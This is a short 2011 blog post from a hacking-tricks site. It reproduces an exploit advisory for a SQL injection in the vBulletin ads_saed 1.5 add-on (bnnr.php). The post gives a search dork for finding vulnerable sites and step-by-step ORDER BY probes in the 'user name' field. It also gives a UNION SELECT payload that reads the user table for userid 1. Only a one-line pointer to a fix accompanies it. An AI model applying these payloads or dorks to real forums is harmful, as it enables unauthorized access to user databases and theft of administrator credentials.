vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability

Saturday, August 6, 2011

vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________
 
Author: Hussin X
 
Home :  www.IQ-TY.com
 
Mail : darkangel_G85@yahoo.com
___________________________________
 
## script name : ads_saed
 
## d0rk : inurl:"vb/bnnr.php"
 
## Example :
 
 
Go to url : http://server/vb/bnnr.php
 
Exploit in the input "user name" blind injection
 
user name = ' ORDER BY 15/*
 
user name = ' ORDER BY 16/*
 
Now go to Source page  :  " Unknown column '16' in 'order clause'"
 
 
exploit :
 
user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*
 
 
 
# Solution : See here
 
http://www.traidnt.net/vb/showthread.php?t=1102593
 
or update new Product
 
 
 
End

Leave a Reply

Subscribe to Posts | Subscribe to Comments

- Copyright © .Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -